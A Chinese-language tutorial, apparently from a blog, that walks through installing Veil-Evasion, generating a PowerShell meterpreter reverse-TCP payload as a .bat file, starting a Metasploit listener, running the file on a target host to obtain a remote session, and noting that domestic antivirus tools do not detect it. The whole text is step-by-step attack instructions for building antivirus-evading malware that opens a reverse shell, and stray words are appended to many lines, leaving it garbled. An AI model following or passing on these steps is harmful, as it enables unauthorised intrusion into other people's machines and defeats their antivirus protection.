首先安裝python
┌─[root@sch01ar]─[~] └──╼ #cd /sch01ar/Veil/
┌─[root@sch01ar]─[/sch01ar/Veil] └──╼ #cd setup/
┌─[root@sch01ar]─[/sch01ar/Veil/setup] └──╼ #./setup.sh -c
在安裝過程當中,可能會有一處須要輸入msf地址的shell
安裝完成bash
若是veil在運行的時候有什麼錯誤,可使用命令刪除再運行session
┌─[root@sch01ar]─[~] └──╼ #rm -rf /root/.config/wine/veil
┌─[root@sch01ar]─[~] └──╼ #/sch01ar/Veil/setup/setup.sh -c
給Veil權限並打開文件夾tcp
┌─[root@sch01ar]─[/sch01ar] └──╼ #chmod +x Veil/
┌─[root@sch01ar]─[/sch01ar] └──╼ #cd Veil/
若是用python命令打開則會報錯工具
┌─[root@sch01ar]─[/sch01ar/Veil] └──╼ #python Veil.py
打開veil3d
┌─[root@sch01ar]─[/sch01ar/Veil] └──╼ #./Veil.py
輸入list查看工具列表blog
能夠直接回車io
選擇1console
回車
輸入list查看payload列表
選擇22,回車
Veil-Evasion command: use 22
設置LHOST
[powershell/meterpreter/rev_tcp>>] set LHOST 192.168.220.134
生成
[powershell/meterpreter/rev_tcp>>] generate
輸入文件名稱
回車
生成了一個bat文件和msf模塊
bat文件目錄爲
/usr/share/veil-output/source/sch01ar.bat
msf模塊地址
/usr/share/veil-output/handlers/sch01ar.rc
開啓msf監聽
┌─[root@sch01ar]─[~] └──╼ #msfconsole -r /usr/share/veil-output/handlers/sch01ar.rc
在目標主機運行bat文件,攻擊主機獲得反彈的目標主機
輸入sessions查看會話
病毒掃描結果
國內的殺軟都沒有檢測出來